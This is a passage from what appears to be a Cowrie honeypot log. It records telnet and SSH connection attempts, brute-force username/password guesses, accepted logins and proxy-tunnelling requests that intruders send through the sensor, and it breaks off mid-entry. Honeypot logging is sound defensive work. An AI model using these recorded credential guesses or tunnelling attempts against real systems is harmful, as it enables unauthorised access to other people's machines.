{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:47:52.940602Z","src_ip":"213.209.150.239","session":"37a536d48b0a"}
{"eventid":"cowrie.session.closed","duration":12.806759595870972,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:48:04.091008Z","src_ip":"212.227.125.160","session":"69f93405707f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45650,"dst_ip":"1.2.3.4","dst_port":23,"session":"5be59b0733d4","protocol":"telnet","message":"New connection: 212.227.125.160:45650 (1.2.3.4:23) [session: 5be59b0733d4]","sensor":"my-vps","timestamp":"2025-08-26T02:48:04.288465Z"}
{"eventid":"cowrie.session.closed","duration":12.788683652877808,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:48:17.077057Z","src_ip":"212.227.125.160","session":"5be59b0733d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45960,"dst_ip":"1.2.3.4","dst_port":23,"session":"d607319e0908","protocol":"telnet","message":"New connection: 212.227.125.160:45960 (1.2.3.4:23) [session: d607319e0908]","sensor":"my-vps","timestamp":"2025-08-26T02:48:17.286635Z"}
{"eventid":"cowrie.session.closed","duration":12.789377212524414,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:48:30.075940Z","src_ip":"212.227.125.160","session":"d607319e0908"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46255,"dst_ip":"1.2.3.4","dst_port":23,"session":"a9b4f213df21","protocol":"telnet","message":"New connection: 212.227.125.160:46255 (1.2.3.4:23) [session: a9b4f213df21]","sensor":"my-vps","timestamp":"2025-08-26T02:48:30.285946Z"}
{"eventid":"cowrie.session.closed","duration":12.802031517028809,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:48:43.087912Z","src_ip":"212.227.125.160","session":"a9b4f213df21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46556,"dst_ip":"1.2.3.4","dst_port":23,"session":"a2fbf80251a1","protocol":"telnet","message":"New connection: 212.227.125.160:46556 (1.2.3.4:23) [session: a2fbf80251a1]","sensor":"my-vps","timestamp":"2025-08-26T02:48:43.297705Z"}
{"eventid":"cowrie.session.closed","duration":12.765928268432617,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:48:56.063564Z","src_ip":"212.227.125.160","session":"a2fbf80251a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46858,"dst_ip":"1.2.3.4","dst_port":23,"session":"a34287cc104e","protocol":"telnet","message":"New connection: 212.227.125.160:46858 (1.2.3.4:23) [session: a34287cc104e]","sensor":"my-vps","timestamp":"2025-08-26T02:48:56.291692Z"}
{"eventid":"cowrie.session.closed","duration":12.779361009597778,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:49:09.070987Z","src_ip":"212.227.125.160","session":"a34287cc104e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47147,"dst_ip":"1.2.3.4","dst_port":23,"session":"d4372d3c9a12","protocol":"telnet","message":"New connection: 212.227.125.160:47147 (1.2.3.4:23) [session: d4372d3c9a12]","sensor":"my-vps","timestamp":"2025-08-26T02:49:09.271223Z"}
{"eventid":"cowrie.session.closed","duration":12.79289436340332,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:49:22.064041Z","src_ip":"212.227.125.160","session":"d4372d3c9a12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47452,"dst_ip":"1.2.3.4","dst_port":23,"session":"355aa32c2fe1","protocol":"telnet","message":"New connection: 212.227.125.160:47452 (1.2.3.4:23) [session: 355aa32c2fe1]","sensor":"my-vps","timestamp":"2025-08-26T02:49:22.289672Z"}
{"eventid":"cowrie.session.closed","duration":12.781899690628052,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:49:35.071507Z","src_ip":"212.227.125.160","session":"355aa32c2fe1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47755,"dst_ip":"1.2.3.4","dst_port":23,"session":"c5a7eda0c097","protocol":"telnet","message":"New connection: 212.227.125.160:47755 (1.2.3.4:23) [session: c5a7eda0c097]","sensor":"my-vps","timestamp":"2025-08-26T02:49:35.291817Z"}
{"eventid":"cowrie.session.closed","duration":12.797363758087158,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:49:48.089110Z","src_ip":"212.227.125.160","session":"c5a7eda0c097"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48054,"dst_ip":"1.2.3.4","dst_port":23,"session":"492a4e138d66","protocol":"telnet","message":"New connection: 212.227.125.160:48054 (1.2.3.4:23) [session: 492a4e138d66]","sensor":"my-vps","timestamp":"2025-08-26T02:49:48.306117Z"}
{"eventid":"cowrie.session.closed","duration":12.76578950881958,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:50:01.071835Z","src_ip":"212.227.125.160","session":"492a4e138d66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48345,"dst_ip":"1.2.3.4","dst_port":23,"session":"c4bc3ad626b2","protocol":"telnet","message":"New connection: 212.227.125.160:48345 (1.2.3.4:23) [session: c4bc3ad626b2]","sensor":"my-vps","timestamp":"2025-08-26T02:50:01.278023Z"}
{"eventid":"cowrie.session.closed","duration":12.785121440887451,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:50:14.063039Z","src_ip":"212.227.125.160","session":"c4bc3ad626b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48652,"dst_ip":"1.2.3.4","dst_port":23,"session":"4cdd9bfdd515","protocol":"telnet","message":"New connection: 212.227.125.160:48652 (1.2.3.4:23) [session: 4cdd9bfdd515]","sensor":"my-vps","timestamp":"2025-08-26T02:50:14.271154Z"}
{"eventid":"cowrie.session.closed","duration":12.792495250701904,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:50:27.063578Z","src_ip":"212.227.125.160","session":"4cdd9bfdd515"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48947,"dst_ip":"1.2.3.4","dst_port":23,"session":"685adb0a046f","protocol":"telnet","message":"New connection: 212.227.125.160:48947 (1.2.3.4:23) [session: 685adb0a046f]","sensor":"my-vps","timestamp":"2025-08-26T02:50:27.276040Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53784,"dst_ip":"1.2.3.4","dst_port":22,"session":"a71033673a40","protocol":"ssh","message":"New connection: 217.72.205.35:53784 (1.2.3.4:22) [session: a71033673a40]","sensor":"my-vps","timestamp":"2025-08-26T02:50:39.489978Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:50:39.491121Z","src_ip":"217.72.205.35","session":"a71033673a40"}
{"eventid":"cowrie.session.closed","duration":12.804969072341919,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:50:40.080940Z","src_ip":"212.227.125.160","session":"685adb0a046f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49253,"dst_ip":"1.2.3.4","dst_port":23,"session":"538e528f2aff","protocol":"telnet","message":"New connection: 212.227.125.160:49253 (1.2.3.4:23) [session: 538e528f2aff]","sensor":"my-vps","timestamp":"2025-08-26T02:50:40.305787Z"}
{"eventid":"cowrie.session.closed","duration":12.77021837234497,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:50:53.075937Z","src_ip":"212.227.125.160","session":"538e528f2aff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49556,"dst_ip":"1.2.3.4","dst_port":23,"session":"2bb6340ea24e","protocol":"telnet","message":"New connection: 212.227.125.160:49556 (1.2.3.4:23) [session: 2bb6340ea24e]","sensor":"my-vps","timestamp":"2025-08-26T02:50:53.296826Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35970,"dst_ip":"1.2.3.4","dst_port":22,"session":"e42f95423664","protocol":"ssh","message":"New connection: 212.227.235.229:35970 (1.2.3.4:22) [session: e42f95423664]","sensor":"my-vps","timestamp":"2025-08-26T02:51:05.618278Z"}
{"eventid":"cowrie.session.closed","duration":12.768454551696777,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:51:06.065214Z","src_ip":"212.227.125.160","session":"2bb6340ea24e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49847,"dst_ip":"1.2.3.4","dst_port":23,"session":"0a83060a24a1","protocol":"telnet","message":"New connection: 212.227.125.160:49847 (1.2.3.4:23) [session: 0a83060a24a1]","sensor":"my-vps","timestamp":"2025-08-26T02:51:06.281808Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:51:06.489678Z","src_ip":"212.227.235.229","session":"e42f95423664"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T02:51:06.490418Z","src_ip":"212.227.235.229","session":"e42f95423664"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:51:10.405839Z","src_ip":"212.227.235.229","session":"e42f95423664"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:51:11.201248Z","src_ip":"212.227.235.229","session":"e42f95423664"}
{"eventid":"cowrie.session.closed","duration":12.790613174438477,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:51:19.072351Z","src_ip":"212.227.125.160","session":"0a83060a24a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50125,"dst_ip":"1.2.3.4","dst_port":23,"session":"ad2ed7168c52","protocol":"telnet","message":"New connection: 212.227.125.160:50125 (1.2.3.4:23) [session: ad2ed7168c52]","sensor":"my-vps","timestamp":"2025-08-26T02:51:19.289223Z"}
{"eventid":"cowrie.session.closed","duration":12.795430898666382,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:51:32.084590Z","src_ip":"212.227.125.160","session":"ad2ed7168c52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50419,"dst_ip":"1.2.3.4","dst_port":23,"session":"523d0a5a4114","protocol":"telnet","message":"New connection: 212.227.125.160:50419 (1.2.3.4:23) [session: 523d0a5a4114]","sensor":"my-vps","timestamp":"2025-08-26T02:51:32.284124Z"}
{"eventid":"cowrie.session.closed","duration":12.804166555404663,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:51:45.088234Z","src_ip":"212.227.125.160","session":"523d0a5a4114"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50722,"dst_ip":"1.2.3.4","dst_port":23,"session":"9260d1e6ff0d","protocol":"telnet","message":"New connection: 212.227.125.160:50722 (1.2.3.4:23) [session: 9260d1e6ff0d]","sensor":"my-vps","timestamp":"2025-08-26T02:51:45.299370Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55173,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bb6d26572f2","protocol":"ssh","message":"New connection: 212.227.125.160:55173 (1.2.3.4:22) [session: 3bb6d26572f2]","sensor":"my-vps","timestamp":"2025-08-26T02:51:50.218982Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:51:50.220576Z","src_ip":"212.227.125.160","session":"3bb6d26572f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55425,"dst_ip":"1.2.3.4","dst_port":22,"session":"65f4082d5f93","protocol":"ssh","message":"New connection: 212.227.125.160:55425 (1.2.3.4:22) [session: 65f4082d5f93]","sensor":"my-vps","timestamp":"2025-08-26T02:51:50.333121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:51:50.334308Z","src_ip":"212.227.125.160","session":"65f4082d5f93"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T02:51:50.448503Z","src_ip":"212.227.125.160","session":"65f4082d5f93"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:51:50.789965Z","src_ip":"212.227.125.160","session":"65f4082d5f93"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T02:51:50.904291Z","session":"65f4082d5f93"}
{"eventid":"cowrie.session.closed","duration":12.765316247940063,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:51:58.064622Z","src_ip":"212.227.125.160","session":"9260d1e6ff0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51019,"dst_ip":"1.2.3.4","dst_port":23,"session":"34ee32cc285a","protocol":"telnet","message":"New connection: 212.227.125.160:51019 (1.2.3.4:23) [session: 34ee32cc285a]","sensor":"my-vps","timestamp":"2025-08-26T02:51:58.272120Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":13088,"dst_ip":"1.2.3.4","dst_port":22,"session":"83378bdc44d4","protocol":"ssh","message":"New connection: 212.227.235.229:13088 (1.2.3.4:22) [session: 83378bdc44d4]","sensor":"my-vps","timestamp":"2025-08-26T02:52:01.859023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T02:52:01.860957Z","src_ip":"212.227.235.229","session":"83378bdc44d4"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T02:52:01.964770Z","src_ip":"212.227.235.229","session":"83378bdc44d4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"turk182","message":"login attempt [admin/turk182] failed","sensor":"my-vps","timestamp":"2025-08-26T02:52:02.462202Z","src_ip":"212.227.235.229","session":"83378bdc44d4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"tryagain","message":"login attempt [admin/tryagain] failed","sensor":"my-vps","timestamp":"2025-08-26T02:52:03.568397Z","src_ip":"212.227.235.229","session":"83378bdc44d4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"trekker","message":"login attempt [admin/trekker] failed","sensor":"my-vps","timestamp":"2025-08-26T02:52:04.676080Z","src_ip":"212.227.235.229","session":"83378bdc44d4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"tramp","message":"login attempt [admin/tramp] failed","sensor":"my-vps","timestamp":"2025-08-26T02:52:05.781875Z","src_ip":"212.227.235.229","session":"83378bdc44d4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"toonces","message":"login attempt [admin/toonces] failed","sensor":"my-vps","timestamp":"2025-08-26T02:52:06.888652Z","src_ip":"212.227.235.229","session":"83378bdc44d4"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:52:07.994490Z","src_ip":"212.227.235.229","session":"83378bdc44d4"}
{"eventid":"cowrie.session.closed","duration":12.783716201782227,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:52:11.055742Z","src_ip":"212.227.125.160","session":"34ee32cc285a"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:53:00.332716Z","src_ip":"212.227.125.160","session":"65f4082d5f93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62341,"dst_ip":"1.2.3.4","dst_port":22,"session":"8534a077ea31","protocol":"ssh","message":"New connection: 212.227.235.229:62341 (1.2.3.4:22) [session: 8534a077ea31]","sensor":"my-vps","timestamp":"2025-08-26T02:53:56.934615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T02:53:56.935406Z","src_ip":"212.227.235.229","session":"8534a077ea31"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T02:53:57.063744Z","src_ip":"212.227.235.229","session":"8534a077ea31"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T02:53:57.662871Z","src_ip":"212.227.235.229","session":"8534a077ea31"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:53:58.793897Z","src_ip":"212.227.235.229","session":"8534a077ea31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36708,"dst_ip":"1.2.3.4","dst_port":22,"session":"222ba469825a","protocol":"ssh","message":"New connection: 212.227.235.229:36708 (1.2.3.4:22) [session: 222ba469825a]","sensor":"my-vps","timestamp":"2025-08-26T02:54:11.177821Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T02:54:11.180330Z","src_ip":"212.227.235.229","session":"222ba469825a"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T02:54:11.827080Z","src_ip":"212.227.235.229","session":"222ba469825a"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:54:12.376519Z","src_ip":"212.227.235.229","session":"222ba469825a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"108.129.19.169","dst_port":443,"src_ip":"212.227.235.229","src_port":40250,"message":"direct-tcp connection request to 108.129.19.169:443 from 127.0.0.1:40250","sensor":"my-vps","timestamp":"2025-08-26T02:54:15.527539Z","session":"222ba469825a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"108.129.19.169","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xa0D\\xf49\\xda\\xe8G\\x0b\\xa3\\xab\\xef\"\\xaa\\xd8\\xb44\\xb9\\x97 ]\\xef\\n\\xff \\xab;\\xbaD\\xa5\\x19\\x9d+ 